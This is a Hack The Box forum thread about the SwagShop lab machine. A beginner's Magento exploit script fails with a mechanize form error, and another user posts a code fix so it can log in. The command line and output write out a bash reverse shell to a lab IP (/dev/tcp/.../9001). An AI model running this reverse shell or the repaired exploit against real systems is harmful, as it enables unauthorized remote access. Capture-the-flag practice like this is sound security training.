SwagShop - errors in script 37811.py

edited October 11 in Exploits

Hi guys,

I'm pretty new on HTB and trying to hack my first machine "SwagShop".

I am using following command to get the reverse shell: python 37811.py http://10.10.10.140/index.php/admin/ 'bash -c "bash -i >& /dev/tcp/10.10.13.xxx/9001 0>&1"'

In the config section of the script I've set the right user, password and also the correct install date. Also tryed burp suite to find out whats wrong but no clue.

attached my output:
[email protected]:~# python 37811.py http://10.10.10.140/index.php/admin/ 'bash -c "bash -i >& /dev/tcp/10.10.xx.xx/9001 0>&1"'

Traceback (most recent call last):
File "37811.py", line 55, in
br['login[username]'] = username
File "/usr/lib/python2.7/dist-packages/mechanize/_mechanize.py", line 796, in setitem
self.form[name] = val
File "/usr/lib/python2.7/dist-packages/mechanize/_form_controls.py", line 1963, in setitem
control = self.find_control(name)
File "/usr/lib/python2.7/dist-packages/mechanize/_form_controls.py", line 2355, in find_control
return self._find_control(name, type, kind, id, label, predicate, nr)
File "/usr/lib/python2.7/dist-packages/mechanize/_form_controls.py", line 2446, in _find_control
description)
mechanize._form_controls.AmbiguityError: more than one control matching name 'login[username]'

Thanks for any advice.

BR
d3vided

Comments

  • edited October 12

    This error results because for whatever reason, Mechanize is seeing multiple username/password fields. The index parameter must be used to select the correct one. Comment out the following in the script:

    #br.form.new_control('text', 'login[username]', {'value': username})  # Had to manually add username control.
    #br.form.fixup()
    #br['login[username]'] = username
    #br['login[password]'] = password
    

    And replace it with this:

    userone = br.find_control(name="login[username]", nr=0)
    userone.value = username
    pwone = br.find_control(name="login[password]", nr=0)
    pwone.value = password
    

    This should fix the issue and allow Mechanize to log in. Note that more modification to the script will be required per the Ippsec video and official write-up.

  • Hey Ruri. works great thx. :)

Sign In to comment.